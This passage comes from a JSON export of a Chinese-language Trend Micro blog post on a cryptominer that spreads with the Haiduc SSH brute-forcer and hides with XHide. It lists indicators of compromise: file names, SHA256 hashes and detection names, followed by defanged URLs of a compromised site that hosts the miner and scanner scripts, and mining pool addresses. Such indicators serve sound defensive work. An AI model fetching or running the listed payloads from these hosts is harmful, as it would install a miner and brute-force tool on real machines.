3f36a82e37f8dc885bab158568d0df3b7857b830250fdf32be39a1dadea6f460\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJS<\/a>\n  <\/td><td>\n  \u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\u3002\n  <\/td><\/tr><tr><td>\n  monero.tgz\n  <\/td><td>\n  eb34d838d0b678dcc2f19140dc312680782e011b1b1ecb0f2ec890f5d3943544\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.linux.malxmr.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.Linux.MALXMR.UWEJS<\/a>\n  <\/td><td>\n  \u6316\u7926\u7a0b\u5f0f\u58d3\u7e2e\u6a94\u3002\n  <\/td><\/tr><tr><td>\n  nano.sh\n  <\/td><td>\n  fee602278dee4cc23d5a6c19f10d1d45702a9bbc14e1a0b54af938dff3bef22e\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uwejt\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJT<\/a>\n  <\/td><td>\n  \u4e0b\u8f09\u5143\u4ef6\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  pools.txt\n  <\/td><td>\n  cd590e2343810e17d5c96d8db76c11b4e08ad7b3c3ed5424965b9098f0308f57\n  <\/td><td>\n  Trojan.Win32.MALXMR.BJ\n  <\/td><td>\n  \u8a2d\u5b9a\u6a94\u3002\n  <\/td><\/tr><tr><td>\n  rcmd.sh\n  <\/td><td>\n  46dc8a5ba6f7dc9ce1f51039b434d53bd90bf19314f9c4b4238c23a29230ccff\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.sh.malxmr.uweju\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.SH.MALXMR.UWEJU<\/a>\n  <\/td><td>\n  \u5411 C&amp;C \u56de\u5831\u3002\n  <\/td><\/tr><tr><td>\n  run\n  <\/td><td>\n  420aeb234ab803ac8e12250ce15c4c63870bbd68f6037ef68655187739429dc1\n  <\/td><td>\n  Trojan.SH.MALXMR.UWEJW\n  <\/td><td>\n  \u57f7\u884c\u6316\u7926\u7a0b\u5f0f\u8207\u57f7\u884c\u7a0b\u5e8f\u96b1\u85cf\u5143\u4ef6\u3002\n  <\/td><\/tr><tr><td>\n  sparky.sh\n  <\/td><td>\n  64a66a8254b45debc1d0efea6662e240d9832ef0667ce805d2b6aaa8ff90ce18\n  <\/td><td>\n  Trojan.SH.SSHBRUTE.UWEJS\n  <\/td><td>\n  \u57f7\u884c\u6383\u7784\u7a0b\u5f0f\u5143\u4ef6\u3002\n  <\/td><\/tr><tr><td>\n  sslm.tgz\n  <\/td><td>\n  8cce20ac223b14200e8b1fc23bde114e19bfef5762d461156dad13f22ea25a5f\n  <\/td><td>\n  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/trojan.linux.sshbrute.uwejs\" target=\"_blank\" rel=\"noreferrer noopener\">Trojan.Linux.SSHBRUTE.UWEJS<\/a>\n  <\/td><td>\n  \u6383\u7784\u7a0b\u5f0f\u58d3\u7e2e\u6a94\u3002\n  <\/td><\/tr><tr><td>\n  start\n  <\/td><td>\n  5725edd6ae0a832ec1f474caa78345761db630278459db17434d08876722659b\n  <\/td><td>\n  Trojan.SH.SSHBRUTE.UWEJS\n  <\/td><td>\n  \u57f7\u884c\u5143\u4ef6\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  start.sh\n  <\/td><td>\n  d75bac897dfbdd5ed97775ae30e23a55695868c3e5702f449364400815f6a049\n  <\/td><td>\n  Trojan.SH.SSHBRUTE.UWEJS\n  <\/td><td>\n  \u57f7\u884c\u5143\u4ef6\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  startMSR\n  <\/td><td>\n  473b58ed5e8667ff8ab54044ed8b070edb5a227837ffb28b992396dcb4a3aacb\n  <\/td><td>\n  Trojan.SH.MALXMR.UWEJW\n  <\/td><td>\n  \u57f7\u884c\u6316\u7926\u7a0b\u5f0f\u8207\u57f7\u884c\u7a0b\u5e8f\u96b1\u85cf\u5143\u4ef6\u3002\n  <\/td><\/tr><tr><td>\n  x\n  <\/td><td>\n  78ea53a03343b0a471476b8e1f3fae6ef847ad097dd16be4628d650bce353e4d\n  <\/td><td>\n  Trojan.SH.MALXMR.UWEJS\n  <\/td><td>\n  \u57f7\u884c\u5143\u4ef6\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  xmr-stak\n  <\/td><td>\n  8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c\n  <\/td><td>\n  Coinminer.Linux.MALXMR.UWEKF\n  <\/td><td>\n  \u6316\u7926\u7a0b\u5f0f\u4e8c\u9032\u4f4d\u6a94\u6848\u3002\n  <\/td><\/tr><tr><td>\n  xmrig\n  <\/td><td>\n  e41b2012a4fdc58370f243f3dbb65ee5db12b007919528b0d4bd0d9b0f948abb\n  <\/td><td>\n  Coinminer.Linux.MALXMR.SMDSL64\n  <\/td><td>\n  \u6316\u7926\u7a0b\u5f0f\u4e8c\u9032\u4f4d\u6a94\u6848\u3002\n  <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><em>\u76f8\u95dc\u60e1\u610f\u7db2\u5740\uff1a<\/em><\/p>\n\n\n\n<p>139[.]99[.]42[.]75:3333<\/p>\n\n\n\n<p>pool[.]masari[.]hashvault[.]pro:3333<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/min<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/min.sh<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/remote\/cron.sh<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/monero.tgz<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/sslm.tgz<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/remote\/info.php<\/p>\n\n\n\n<p>hxxps:\/\/upajmeter[.]com\/assets\/.style\/remote\/rcmd.sh<\/p>\n\n\n\n<p>\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/cybercrime-and-digital-threats\/cryptocurrency-miner-uses-hacking-tool-haiduc-and-app-hider-xhide-to-brute-force-machines-and-servers\">Cryptocurrency Miner Uses Hacking Tool\nHaiduc and App Hider Xhide to Brute Force Machines and Servers<\/a> <em>\u4f5c\u8005<\/em><em>\uff1aAugusto&nbsp;Remillano\nII <\/em><em>\u8207<\/em><em> Jemimah\nMolina (<\/em><em>\u5a01\u8105\u5206\u6790\u5e2b<\/em><em>)<\/em><em><\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8da8\u52e2\u79d1\u6280\u67b6\u8a2d\u7684\u67d0\u500b\u8a98\u6355\u74b0\u5883\u5728\u4e00\u500b\u906d\u5230\u5165\u4fb5\u7684\u7db2\u7ad9 (hxxps:\/\/upajmeter[.]com\/assets [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[3373,3647,2744],"tags":[3575,83,3723],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/63218"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=63218"}],"version-history":[{"count":1,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/63218\/revisions"}],"predecessor-version":[{"id":63219,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/63218\/revisions\/63219"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=63218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=63218"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=63218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}